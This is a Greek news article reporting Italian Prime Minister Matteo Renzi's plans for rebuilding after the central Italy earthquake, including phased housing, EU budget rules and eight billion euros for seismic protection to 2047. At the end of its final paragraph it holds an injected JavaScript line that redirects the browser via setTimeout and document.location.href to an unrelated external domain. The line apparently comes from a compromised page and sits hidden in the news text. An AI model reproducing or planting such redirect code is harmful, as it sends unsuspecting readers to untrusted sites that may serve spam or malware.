Ρέντσι: Δεν υπάρχει μπρα ντε φερ με την Ευρώπη

0
2

 

«Θα ανοικοδομήσουμε όλες τις εκκλησίες και όλα τα σπίτια», δήλωσε ο Ιταλός πρωθυπουργός Ματέο Ρέντσι, μετά την ολοκλήρωση του υπουργικού συμβουλίου με αντικείμενο την αντιμετώπιση της κατάστασης εκτάκτου ανάγκης στην κεντρική Ιταλία, μετά το χτύπημα του Εγκέλαδου.

Ο Ιταλός πρωθυπουργός πρόσθεσε ότι οι διάφορες παρεμβάσεις θα πραγματοποιηθούν σε τέσσερις φάσεις: θα ζητήσουμε στους άστεγους να πάνε σε ασφαλείς περιοχές για λίγες εβδομάδες. Στη συνέχεια θα στήσουμε τα κοντέινερ. Η τρίτη φάση θα καλύψει την περίοδο από τον Δεκέμβριο μέχρι την άνοιξη, με την δημιουργία ξύλινων σπιτιών, και μετά θα ακολουθήσει η ανοικοδόμηση», τόνισε ο Ρέντσι.

«Δεν υφίσταται μπρα ντε φερ με την Ευρώπη, δεν υπάρχουν προβλήματα, για τον σεισμό και την ανοικοδόμηση θα ξοδέψουμε όσα χρήματα χρειάζονται. Σεβόμαστε τους ευρωπαϊκούς κανόνες οι οποίοι λένε ότι υπάρχουν ειδικοί όροι, σε περίπτωση ειδικών συνθηκών», είπε ο Ιταλός πρωθυπουργός, απαντώντας σε σχετική ερώτηση. Επανέλαβε, δε, ότι τόσο το προσφυγικό όσο και η αντιμετώπιση του σεισμού πρέπει να θεωρηθούν έκτακτες δαπάνες.

Η κυβέρνηση της Ρώμης πρόκειται να αυξήσει άμεσα τον αριθμό των αστυνομικών δυνάμεων στις πληγείσες περιοχές, αλλά και το σύνολο των τεχνικών και μηχανικών που προχωρούν σε αυτοψίες, για την εξακρίβωση της κατάστασης των κτηρίων. Πρόκειται να διατεθούν οκτώ δισεκατομμύρια ευρώ για την αντισεισμική θωράκιση της χώρας, από φέτος μέχρι το 2047. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here